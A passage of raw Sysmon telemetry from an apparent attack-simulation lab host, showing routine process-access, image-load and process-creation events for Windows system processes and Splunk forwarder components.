ramework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006910Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:47:46.749{59A5CD1D-9181-6005-B202-00000000A301}4396C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\112c-0\System.Speech.dll2021-01-18 13:47:46.749 10341000x80000000000000006909Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.483{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006908Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006907Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006906Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006905Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006904Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006903Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006902Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006901Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006900Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006899Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006898Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.483{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006897Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:46.343{59A5CD1D-9182-6005-B302-00000000A301}4916C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006930Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.561{59A5CD1D-9183-6005-B602-00000000A301}34643004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006929Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006928Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006927Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006926Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006925Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006924Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006923Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006922Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006921Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006920Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:47:47.421{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006919Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006918Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:47:47.421{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9183-6005-B602-00000000A301}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
